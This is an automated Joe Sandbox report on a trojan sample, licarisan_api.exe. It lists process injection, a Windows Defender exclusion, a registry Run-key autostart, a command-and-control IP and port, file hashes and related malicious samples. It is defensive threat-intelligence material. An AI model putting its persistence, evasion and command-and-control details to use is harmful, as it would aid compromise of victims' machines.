                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: \rkd.exe

Stealing of Sensitive Information

Source: Yara match | File source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques per tactic; the number in parentheses is the count of matching signatures, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Create Account (1); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (312); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Disable or Modify Tools (111); Virtualization/Sandbox Evasion (31); Process Injection (312); Obfuscated Files or Information (111); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (11); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1526431 | Sample: licarisan_api.exe | Start date: 05/10/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: ipinfo.io; 15.164.165.52.in-addr.arpa
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 10 other signatures
  Started: licarisan_api.exe (node 11); explorer.exe (node 15); explorer.exe (node 17)

licarisan_api.exe (node 11)
  Dropped: C:\Users\user\Music\...yesUpdater.exe, PE32
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Drops large PE files; Injects a PE file into a foreign processes
  Started: csc.exe (node 19)

csc.exe (node 19)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  Started: cvtres.exe (node 22); explorer.exe (node 26)

cvtres.exe (node 22)
  DNS/IP: 193.142.146.64, ports 49803, 49815, 49832 (HOSTSLICK-GERMANYNL, Netherlands); ipinfo.io 34.117.59.81, ports 49804, 49816, 49833 (GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: cmd.exe (node 28); cmd.exe (node 31); conhost.exe (node 33)

cmd.exe (node 28)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: powershell.exe (node 35); conhost.exe (node 38)

cmd.exe (node 31)
  Started: powershell.exe (node 40); conhost.exe (node 42)

powershell.exe (node 35)
  Signatures: Loading BitLocker PowerShell Module
  Started: WmiPrvSE.exe (node 44)

Source | Detection | Scanner | Label
licarisan_api.exe | 21% | ReversingLabs | Win32.Trojan.Midie
licarisan_api.exe | 34% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
ipinfo.io | 0% | Virustotal |
15.164.165.52.in-addr.arpa | 0% | Virustotal |
Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ascstats.iobit.com/usage.phpU | 0% | Virustotal |
http://piriform.com/go/app_cc_privacy_policy | 0% | Virustotal |
http://www.piriform.com/ccleaner | 0% | Virustotal |
http://ipinfo.io/ip | 0% | Virustotal |
http://ipinfo.io/ipd | 0% | Virustotal |
http://piriform.com/go/app_cc_license_agreement | 0% | Virustotal |
http://ipinfo.io | 0% | Virustotal |
https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.59.81 | true | false | | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
193.142.146.64:8880 | true | | unknown
http://ipinfo.io/ip | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://piriform.com/go/app_cc_privacy_policy | licarisan_api.exe, EyesUpdater.exe.0.dr | false | | unknown
http://ascstats.iobit.com/usage.phpU | licarisan_api.exe, EyesUpdater.exe.0.dr | false | | unknown
http://www.piriform.com/ccleaner | licarisan_api.exe, EyesUpdater.exe.0.dr | false | | unknown
http://ipinfo.iod | cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000303A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://piriform.com/go/app_cc_license_agreement | licarisan_api.exe, EyesUpdater.exe.0.dr | false | | unknown
http://ipinfo.io/ipd | cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ipinfo.io | cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png | cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.142.146.64 | unknown | Netherlands | 208046 | HOSTSLICK-GERMANYNL | true
34.117.59.81 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1526431
Start date and time: 2024-10-05 16:45:18 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: licarisan_api.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@21/12@5/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 197
• Number of non-executed functions: 37
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target cvtres.exe, PID 7640 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
11:47:29 | API Interceptor | 41x Sleep call for process: powershell.exe modified
11:47:31 | API Interceptor | 476581x Sleep call for process: cvtres.exe modified
16:46:34 | Task Scheduler | Run new task: CreateExplorerShellUnelevatedTask path: C:\Windows\explorer.exe s>/NoUACCheck
17:47:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OcuulusUpdater C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe
17:47:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OcuulusUpdater C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
193.142.146.64 | an_api.exe | Get hash | malicious | Unknown | Browse |
 | build.exe | Get hash | malicious | Unknown | Browse |
 | Form-8879_PDF.jar | Get hash | malicious | Unknown | Browse |
 | Form-8879_PDF.jar | Get hash | malicious | Unknown | Browse |
34.117.59.81 | build.exe | Get hash | malicious | Unknown | Browse | ipinfo.io/ip
 | YjcgpfVBcm.bat | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | lePDF.cmd | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | 6Mpsoq1.php.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | mjOiDa1hrN.bat | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | 8ym4cxJPyl.ps1 | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | GKrKPXOkdF.zsb.dll | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | JuhnladbIs.qao.dll | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | bdsBbxwPyV.ena.dll | Get hash | malicious | Unknown | Browse | ipinfo.io/json
 | fblXRRCHON.pos.dll | Get hash | malicious | Unknown | Browse | ipinfo.io/json
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ipinfo.io | build.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
 | d1bc91bd44a0.exe | Get hash | malicious | PrivateLoader, Stealc, Vidar | Browse | 34.117.59.81
 | setup.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
 | file.exe | Get hash | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | Browse | 34.117.59.81
 | sqlite.dll | Get hash | malicious | Unknown | Browse | 34.117.59.81
 | T3xpD9ZaYu.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 34.117.59.81
 | 66fb252fe232b_Patksl.exe | Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse | 34.117.59.81
 | file.exe | Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse | 34.117.59.81
 | file.exe | Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse | 34.117.59.81
 | OXrZ6fj4Hq.exe | Get hash | malicious | Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm | Browse | 34.117.59.81
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
HOSTSLICK-GERMANY NL | an_api.exe | Get hash | malicious | Unknown | Browse | 193.142.146.64
 | build.exe | Get hash | malicious | Unknown | Browse | 193.142.146.64
 | ub16vsLP6y.zip | Get hash | malicious | Remcos | Browse | 193.142.146.203
 | ISehgzqm2V.zip | Get hash | malicious | Remcos | Browse | 193.142.146.203
 | Form-8879_PDF.jar | Get hash | malicious | Unknown | Browse | 193.142.146.64
 | Form-8879_PDF.jar | Get hash | malicious | Unknown | Browse | 193.142.146.64
 | bot_library.exe | Get hash | malicious | Unknown | Browse | 193.142.146.43
 | SecuriteInfo.com.ELF.Mirai-CQT.17542.12898.elf | Get hash | malicious | Mirai | Browse | 193.142.146.10
 | arm7.elf | Get hash | malicious | Unknown | Browse | 193.142.146.10
 | SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elf | Get hash | malicious | Unknown | Browse | 193.142.146.10
GOOGLE-AS-APGoogleAsiaPacificPteLtd SG | build.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
 | https://s3.amazonaws.com/r3e1272/Rco.html#4eyOul3510eTKK19nejdimaazo189TBUDIERNFIMTFBQ264510CRSG907S11 | Get hash | malicious | Phisher | Browse | 34.117.39.58
 | http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzg | Get hash | malicious | Unknown | Browse | 34.117.77.79
 | https://lil-loveeeees.blogspot.com/ | Get hash | malicious | Unknown | Browse | 34.117.77.79
 | ethaertharety.ps1 | Get hash | malicious | Unknown | Browse | 34.117.77.79
 | d1bc91bd44a0.exe | Get hash | malicious | PrivateLoader, Stealc, Vidar | Browse | 34.117.59.81
 | TsxJNxhxMJfQTd.ps1 | Get hash | malicious | Unknown | Browse | 34.117.77.79
 | setup.exe | Get hash | malicious | Unknown | Browse | 34.117.59.81
 | hJABTqngKoJnTgLh.ps1 | Get hash | malicious | Unknown | Browse | 34.117.77.79
 | https://go.hginsights.com/rs/214-HYO-692/images/HG | Get hash | malicious | Unknown | Browse | 34.117.177.207
                              No context
                              No context
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):5.350425818619351
                              Encrypted:false
                              SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAq1KDLI4M6:MLU84qpE4KH1qE4j
                              MD5:EF40B085EA3A6C996900E051DFB237A7
                              SHA1:6DE3D5DD935D5A378422F8BD4F851D9C77C9554C
                              SHA-256:925F2B4F3FBD2DDDC90835ACDA44378C8451D44C07AC21C367F312F94733ED62
                              SHA-512:A9E2D3E43ECB82FADC0E3EA1003EB7CD2CC3A790347D35CB4CBEB81F08BFF82D4868426439C87D2EC746B8E2CF0904EAFA25FCBC91BA26D82659E36C28F91843
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.380805901110357
                              Encrypted:false
                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyug:lGLHyIFKL3IZ2KRH9Oug8g
                              MD5:B960EDFE22DD231143EAD8522EEE36C0
                              SHA1:AF669E2D6B3CA5F3FA976F77CE4BEB475943A3A9
                              SHA-256:030069D45E5C4F5A19B2B2A687F1D1FD676B9049D956B26C5A04B7175A1A378F
                              SHA-512:EE8B762F6A642A4964553D30E7D2A44169D0F27DCCB807C5950403EF321E4C8DBE48CA67D66CCDD9688E10D1E459A0D368DF27AE35BDF60E2795B3F78711083C
                              Malicious:false
                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):10
                              Entropy (8bit):2.446439344671015
                              Encrypted:false
                              SSDEEP:3:MKV/z:MKBz
                              MD5:E27D47991851642F9EDCBA5827441DD5
                              SHA1:D2D3C1B59CDE8CA587E7AF6AA565D0B3A6AD69AB
                              SHA-256:0736DC7C3FEFD085EC17D24EF7BE290E4447B87A1196397DD3203D7C19EEACED
                              SHA-512:BEA4525CFC84C6C666628810723D2A28A2184AEC4F16F8F189425A2D669F62B5F89B00B5035D3B38A94629CF5B0EA5F3A4FD2B224A69C19B4450636AE9989205
                              Malicious:false
                              Preview:10/05/2024
                              Process:C:\Users\user\Desktop\licarisan_api.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):976635604
                              Entropy (8bit):0.05947786259074472
                              Encrypted:false
                              SSDEEP:
                              MD5:20029C77255611C8B6F9E80F4A81EB62
                              SHA1:F2741B8FC4CB365065A63AD5085C561F0FA5C017
                              SHA-256:B4BD94232408814D1FE009CBB777F0297FF15679656E15B0962AFF5A9184D8BD
                              SHA-512:9E3CF62F73B586FD57192CBE603B26BD77D50AED176C17BBA9DA6072C77539FBEC5D1F0D32933F745BE75E64B7C4DA1E079C193232341CD87325370AB1C35847
                              Malicious:false
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...m.$a......................2...................@..........................0B......i>..........@...............................=.......-1..........D=.xO...`...............................P......................d................................text............................... ..`.itext.............................. ..`.data....@.......@..................@....bss.....................................idata...@.......>..................@....tls.........@...........................rdata.......P......................@..@.rsrc....-1.......1.. ..............@..@.....................................................@......................@..@................................................................................................
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.867727256485267
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.94%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:licarisan_api.exe
                              File size:4'038'008 bytes
                              MD5:65a683124fc4ca1839e95322370e2b0d
                              SHA1:7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
                              SHA256:3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
                              SHA512:14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f
                              SSDEEP:49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq
                              TLSH:28166B21F217E44BD5692579D473D5F26262ADF8E0218603BEBE3C373B70EA0590CAD9
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:3b71d48cc8c86907
                              Entrypoint:0x4aac88
                              Entrypoint Section:.itext
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              DLL Characteristics:
                              Time Stamp:0x6124A66D [Tue Aug 24 07:57:33 2021 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:33e003ddaff3bc71480e8cb946f52917
                              Signature Valid:
                              Signature Issuer:
                              Signature Validation Error:
                              Error Number:
                              Not Before, Not After
                                Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  add esp, FFFFFFF0h
                                  mov eax, 004A98E4h
                                  call 00007F965CC9A489h
                                  call 00007F965CD426ACh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  call 00007F965CC9F6BCh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  mov dl, 01h
                                  call 00007F965CC9F6FEh
                                  mov ecx, dword ptr [004AED4Ch]
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  mov edx, dword ptr [004A9528h]
                                  call 00007F965CC9F69Eh
                                  mov eax, dword ptr [004F2830h]
                                  mov eax, dword ptr [eax]
                                  call 00007F965CC9F69Ah
                                  call 00007F965CC9A0EDh
